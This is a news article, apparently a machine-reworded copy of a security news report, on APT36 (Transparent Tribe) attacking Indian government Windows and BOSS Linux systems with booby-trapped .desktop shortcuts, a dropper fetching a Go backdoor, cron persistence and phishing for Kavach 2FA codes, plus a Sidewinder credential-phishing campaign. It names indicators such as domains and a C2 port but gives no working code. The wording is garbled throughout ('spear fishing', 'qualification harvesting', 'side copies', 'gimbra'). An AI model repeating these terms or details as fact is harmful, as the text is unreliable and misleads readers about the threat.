It has been observed that the Advanced Persistent Threat (APT) actor, known as the Transparent Tribe, is targeted both Windows and Boss (Bharat Operating System Solutions) Linux systems with malicious desktop shortcut files in attacks targeting Indian government agencies.
“Initial access is achieved through spear fishing emails,” Cyfirma said. “The Linux Boss environment is targeted via weaponized .DeskTop shortcut files.
The transparent tribe, also known as APT36, is rated as Pakistani origins and has a storied history of invading Indian government agencies with various remote access Trojans (rats) along with their groups, along with their subcluster side copies.
The latest dual platforms show the continued refinement of hostile groups, allowing them to expand their targeting footprint and ensure access to compromised environments.
The attack chain starts with a phishing email that appears to satisfy the notification, but in reality it is nothing more than a Booby-Trapped Linux desktop shortcut file (“Meeting_ltr_id1543ops.pdf.desktop”). These files lead to running shell scripts, spoofing PDF documents to trick recipients and open them.
Shell scripts act as a dropper for getting hex-encoded files from the attacker control server (“SecureStore”[.]cv”) and save it to disk as an elf binary and open a decoy PDF hosted on Google Drive by launching Mozilla Firefox at the same time. The GO-based binary establishes contact with the hard-coded command and control (C2) server, ModGovindia.[.]Space: 4000, receive command, get payload and remove data.
The malware also establishes persistence using Cron jobs that automatically run the main payload after a system restart or process is terminated.
Cybersecurity company CloudSek also independently reported activities, saying it is equipped to run system reconnaissance and perform a series of dummy prevention and anti-sandbox checks to abandon the emulator and static analyzer.
Furthermore, an analysis of Hunt.io’s campaign revealed that the attack was designed to deploy a known transparent tribe backdoor called Poseidon, which allows for data collection, long-term access, qualification harvesting, and potentially lateral movement.
“The ability to customize delivery mechanisms according to the operating environment of APT36 victims increases the likelihood of success while maintaining sustained access to critical government infrastructure and circumventing traditional security controls,” Cyfirma said.
The disclosure comes weeks after transparent tribal actors targeted Indian defence organizations and associated government agencies using a spoofed domain, with the ultimate goal of stealing qualifications and two-factor authentication (2FA) codes. It is believed that users will be redirected to these URLs via spear phishing emails.
“If you enter a valid email ID on the first phishing page and click the ‘Next’ button, the victim will be redirected to the second page, prompting the user to enter the email account password and Kavach authentication code,” Cyfirma said.
It is worth noting that Kavach’s targeting, a 2FA solution used by Indian government agencies to improve account security, is a trial and error tactic adopted by transparent tribes and side copy since early 2022.
“The use of typo domains in conjunction with infrastructure hosted on Pakistan-based servers is consistent with the group’s established tactics, techniques and procedures,” the company said.
The findings also follow the discovery of another campaign carried out by South Asians to attack Bangladesh, Nepal, Pakistan, Sri Lanka and Turkey via spear phishing emails designed for theft like qualifications using look pages hosted on Netlify and Pages.dev.
“These campaigns mimic the formal communications that allow victims to trick them into entering their credentials on fake login pages,” Hunt.io said earlier this month that it was attributed to a hacking group called Sidewinder.
“The spoofed gimbra and secure portal page looked like an official email, file sharing or document upload service, urging victims to submit their credentials through a fake login panel.”
Source link
